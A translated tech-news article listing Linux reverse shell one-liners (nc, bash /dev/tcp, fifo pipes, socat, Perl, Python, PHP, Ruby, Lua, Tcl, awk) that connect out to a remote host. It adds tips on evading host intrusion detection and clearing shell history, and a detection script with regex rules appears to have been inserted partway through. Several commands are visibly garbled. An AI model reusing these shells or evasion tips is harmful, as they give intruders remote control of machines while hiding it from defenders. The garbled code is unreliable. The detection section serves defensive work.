
What are the methods for an intranet reverse shell under Linux?

2025-02-27 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

This article introduces the relevant knowledge of "what are the methods for an intranet reverse shell under Linux". The editor walks through the operation with a real case; the method is simple, fast and practical, and hopefully this article helps you solve the problem.

Summary of reverse shell techniques:

1. nc: nc 1.1.1.1 8080 -e /bin/bash

2. Bash socket: /bin/bash -i > /dev/tcp/1.1.1.1/8080 0x1

3. Shell socket:
   a) exec 2>&0 exec 196devqqqqqp8080; sh &196 2>&196
   b) exec 5/dev/tcp/1.1.1.1/8080 cat while read line; do $line 2>&5 >&5; done [run as two separate commands]

4. File pipe with nc/telnet:
   a) rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 1.1.1.1 8080 > /tmp/f
   b) rm /tmp/backpipe; mknod /tmp/backpipe pash rm 0/backpipe 0/backpipe | nc 1.1.1.1 8080 1>/tmp/backpipe
   c) rm /tmp/backpipe; mknod /tmp/backpipe p && telnet 1.1.1.1 8080 0/backpipe | /bin/bash 1>/tmp/backpipe

5. Bash with telnet: telnet 1.1.1.1 8080 | /bin/bash | telnet 1.1.1.1 9090 [a second port]

6. socat: socat tcp-connect:1.1.1.1:8080 exec:"bash -li",pty,stderr,setsid,sigint,sane

7. Script-based:
   a) Perl:
      1) perl -e 'use Socket $open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};'
      2) perl -MIO -e '$pamphlet for exitplace if ($p) $c=new IO::Socket::INET(PeerAddr,"1.1.1.1 STDIN- 8080"); STDIN->fdopen($c_r); $~->fdopen($c~w); system$_ while;'
   b) Python: python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect("1.1.1.1", 8080); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
   c) PHP: php -r '$sock=fsockopen("1.1.1.1",8080); exec("/bin/sh -i &3 2>&3");'
   d) Ruby:
      1) ruby -rsocket -e 'f=TCPSocket.open("1.1.1.1",8080).to_i; exec sprintf("/bin/sh -i &%d 2>&%d")'
      2) ruby -rsocket -e 'exit if fork; c=TCPSocket.new("1.1.1.1","8080"); while(cmd=c.gets); IO.popen(cmd,"r"){|io| c.print io.read} end'
   e) Lua: lua -e "require('socket'); require('os'); t=socket.tcp(); t:connect('1.1.1.1') os.execute('/bin/sh -i &3 2>&3');"
   f) Tcl: echo 'set [socket 1.1.1.1 8080]; while 42 {puts -nonewline $s "shell > "; flush $s10 gets $s c set e "exec $c"; if {![catch {set r [eval $e]} err]} {puts $s $r}; flush $s;}; close $sscape' | tclsh
   g) awk: awk 'BEGIN {s="/inet/tcp/0/1.1.1.1/8080" While(42) {do {printf "shell >" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& print close(c);}} while (c != "exit") close(s);}' /dev/null

8. Binary program: a socket program plus command execution; see metasploit for details.

Miscellaneous talk

There are many reverse shell scripts and programs around; metasploit, for example, can generate hundreds of shells, but once decoded they amount to little more than the list above. Interestingly, the reverse shell programs metasploit generates, whether script or binary, mostly implement the system calls themselves instead of calling the system's bash or other commands, which is conscientious work.

It is worth mentioning that large Party A (client-side) companies will have HIDS protection, and the known HIDS products either modify bash, hook glibc, or modify the lower layers of the system (the last is unlikely, since it is prone to causing problems).

When you think you can get a reverse shell, you must identify the environment first; otherwise you will execute a bash -i or nc, which is likely to be caught directly by the HIDS.

It is recommended to use a shell built-in reverse shell or a script-type reverse shell program, which the typical HIDS does not record. Producing a reverse shell by calling the system bash command is not recommended: at the very least, .bash_history will give you away.

An intranet reverse shell is a topic that cannot be avoided in either penetration or counter-penetration. There are several interesting questions about reverse shells:

1. Understanding the reverse shell:

The essence of an intranet reverse shell is to establish a connection to a public-network server, execute the commands that server sends, and return the results. A reverse shell therefore involves two processes, establishing the network connection and executing commands, and both are the criteria by which a reverse shell function is measured. Establishing the connection requires strong encryption (for example msf's meterpreter_reverse_https), and command execution requires bypassing the HIDS and related logging as far as possible.

2. Interactive shell:

The interactive shell is the most common kind of shell. The biggest difference between an interactive and a non-interactive shell is that the interactive one loads the environment variables; using it is almost the same as working in a terminal. In general, a reverse shell obtained through remote command execution only yields a non-interactive shell. One of the easiest ways to upgrade from a non-interactive to an interactive shell is the Python call pty.spawn("/bin/bash").
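Read from the defender's side, the catalogue of techniques above and the two-process framing in section 1 (a connection out, then a shell attached to it) translate directly into detection logic: a command line is a strong signal only when it shows both halves, and a single half (a bare pty.spawn upgrade, a port check with nc) is a triage item rather than an alert. The following is an added example, not code from the original article, of a small Python scanner that applies that reasoning to process command lines. The rule names, the "net"/"exec" labels and the sample command lines are constructed for this example (documentation and private addresses), not taken from the page.

```python
"""Classify command lines by the two halves of a reverse shell: "net" (dials out)
and "exec" (wires a shell to the connection). Added example; samples are constructed."""
import re
from typing import NamedTuple


class Rule(NamedTuple):
    name: str
    component: str  # "net" or "exec"
    pattern: re.Pattern


IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"

# Each rule mirrors one technique family from the catalogue above.
RULES = [
    Rule("bash /dev/tcp pseudo-device", "net",
         re.compile(r"/dev/tcp/[\w.:-]+/\d+")),
    Rule("nc/telnet/socat dialling an address", "net",
         re.compile(rf"\b(?:nc|ncat|netcat|telnet|socat)\b[^|;]*?(?:{IPV4}|tcp-connect:)")),
    Rule("script-level socket library", "net",
         re.compile(r"socket\.socket|socket\.tcp|fsockopen|TCPSocket|IO::Socket|/inet/tcp|\[socket\s")),
    Rule("interactive shell flag", "exec",
         re.compile(r"(?:^|[\s/])(?:ba)?sh\s+-l?i\b")),
    # stdin redirected, dup2(), or a redirect to fd >= 3; plain 2>&1 is too common to count
    Rule("fd 0 or a high fd wired to the connection", "exec",
         re.compile(r"\b0[<>]&\s*\d+|\bdup2\(|\b\d+[<>]&\s*(?:[3-9]|\d{2,})\b")),
    Rule("fifo/pipe fed back into a shell", "exec",
         re.compile(r"\b(?:mkfifo|mknod)\b|\|\s*/bin/(?:ba)?sh\b")),
    Rule("netcat -e program execution", "exec",
         re.compile(r"\b(?:nc|ncat|netcat)\b[^|;]*\s-e\s+\S*sh\b")),
    Rule("script runs received commands", "exec",
         re.compile(r"\b(?:subprocess\.call|subprocess\.Popen|os\.execute|IO\.popen|system|exec)\b|eval \$e")),
    Rule("pty.spawn upgrade to interactive shell", "exec",
         re.compile(r"pty\.spawn\(")),
]

# Constructed command lines, as a HIDS or auditd execve record would carry them.
SAMPLES = [
    "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",
    "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 203.0.113.5 4444 > /tmp/f",
    "python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"203.0.113.5\",4444));"
    "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",
    "nc 203.0.113.5 4444 -e /bin/bash",
    "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'",   # upgrade step only: exec half
    "nc -zv 10.0.0.5 443",                                  # port check only: net half
    "make -j4 2>&1 | tee build.log",                        # benign fd redirect
    "ssh deploy@10.0.0.7 'systemctl restart nginx'",        # benign remote admin
]


def analyze(cmdline: str) -> dict:
    """Return a verdict plus the names of the rules that matched one command line."""
    hits = [r for r in RULES if r.pattern.search(cmdline)]
    components = {r.component for r in hits}
    if components == {"net", "exec"}:
        verdict = "reverse-shell"                   # both halves present: alert
    elif components:
        verdict = "partial:" + components.pop()     # one half only: triage queue
    else:
        verdict = "clean"
    return {"verdict": verdict, "evidence": [r.name for r in hits]}


def scan(lines):
    """Analyze every line and return (line, result) pairs."""
    return [(line, analyze(line)) for line in lines]


if __name__ == "__main__":
    for line, result in scan(SAMPLES):
        print(f"{result['verdict']:14} {line[:60]}")
        for name in result["evidence"]:
            print(f"{'':14}   - {name}")
```

The split into two components is what keeps the rule set usable: `2>&1` or a socket import on its own would drown analysts in noise, while a `/dev/tcp` path together with an interactive shell flag on one command line is rarely legitimate. Script-based shells (item 7 above) are the weakest spot for this kind of matching, since the same logic can be written in many spellings, which is the page's own point about why a HIDS that only watches bash misses them.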

3. In actual penetration work an interactive shell is not necessarily better than a non-interactive one, because an experienced Party A will have hardened the environment variables and the files the shell loads on start-up, such as .bashrc and .bash_profile, so upgrading directly to an interactive shell is more likely to trigger a HIDS alert (not always, of course).

(PS: if you use someone else's tool to get a reverse shell and it is not clear whether it is an interactive shell, a simple check is to run the history and set commands; if they return normally you should be careful, since you may have an interactive shell, and clear the history as soon as possible.)

This is the end of the content on "what are the methods for an intranet reverse shell under Linux"; thank you for reading. If you want to know more about the industry, you can follow the industry information channel, where the editor posts different knowledge points every day.

© 2024 shulou.com SLNews company. All rights reserved.